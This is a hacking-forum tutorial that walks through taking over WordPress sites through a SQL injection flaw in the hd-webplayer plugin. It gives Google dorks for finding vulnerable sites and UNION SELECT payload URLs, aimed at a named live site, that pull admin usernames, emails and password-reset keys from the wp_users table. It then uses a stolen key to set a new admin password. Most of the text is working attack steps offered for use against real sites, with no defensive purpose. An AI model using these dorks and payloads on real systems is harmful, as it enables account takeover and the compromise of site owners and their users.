WordPress

1. [Tutorial] Hack WordPress site with SQL injection [Tuto]
2. lets begin.
3.  
4. First of all we need to find a vulnerable page.
5. We enter this in Google:
6.  
7.  
8. Code:
9. # Dork 1 (config.php)
10. inurl:"/wp-content/plugins/hd-webplayer/config.php?id="
11.  
12. # Dork 2 (playlist.php)
13. inurl:"/wp-content/plugins/hd-webplayer/playlist.php?videoid="
14.  
15. # Dork 3 (General):
16. inurl:"/wp-content/plugins/hd-webplayer/"
17.  
18.  
19. When you found your site you need to find admin email and username.
20. I will be using this site for example:
21.  
22.  
23. Code:
24. http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3
25.  
26. Image has been scaled down 10% (835x513). Click this bar to view original image (924x567). Click image to open in new window.
27. [Image: regiont.png]
28.  
29.  
30. When i add ' text disappears so it is vulnerable.
31.  
32. Image has been scaled down 8% (835x363). Click this bar to view original image (907x394). Click image to open in new window.
33. [Image: regionzn.png]
34.  
35.  
36. NOTE: I will not demonstrate how to SQL inject.
37.  
38. Now we need admin username and email.
39. We need to inject:
40.  
41. Code:
42. http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
43.  
44. Now we have 2 users.
45.  
46. http
47. Image has been scaled down 14% (835x416). Click this bar to view original image (965x480). Click image to open in new window.
48. [Image: regionjhg.png]
49.  
50.  
51. We pick one and copy his email.
52. Go to the login page of the site.
53. It is usually here:
54.  
55. Code:
56. http://www.site.com/wp-login.php
57.  
58. And press "Lost your password?"
59.  
60. Image has been scaled down 13% (835x462). Click this bar to view original image (953x527). Click image to open in new window.
61. [Image: regionz.png]
62.  
63.  
64. Now you enter either username or email.
65. We can enter both so it doesnt matter.
66. I entered email.
67.  
68. [Image: regionby.png]
69. [Image: regionng.png]
70.  
71. Now when you got:
72.  
73. "Check your e-mail for the confirmation link."
74.  
75. It means that reset key is successfully sent.
76. Now we need to get the activation key.
77.  
78. Go back to the syntax you used for extracting email and username and do this:
79.  
80. Code:
81. http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--
82.  
83. Code:
84. http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--
85.  
86. Image has been scaled down 11% (835x368). Click this bar to view original image (932x410). Click image to open in new window.
87. [Image: regiongn.png]
88.  
89.  
90. Voila!
91. Now we just need to reset it.
92.  
93. go to:
94. Code:
95. wp-login.php?action=rp&key=resetkey&login=username
96.  
97. NOTE: Replace key= & login=
98.  
99. So my link will be:
100.  
101. Image has been scaled down 6% (835x115). Click this bar to view original image (886x122). Click image to open in new window.
102. [Image: regionzi.png]
103.  
104.  
105. Enter new password:
106.  
107. [Image: thefreenudecelebritysit.png]
108.  
109. [Image: regiongv.png]
110.  
111. Thanks for reading! Emot-c00lbert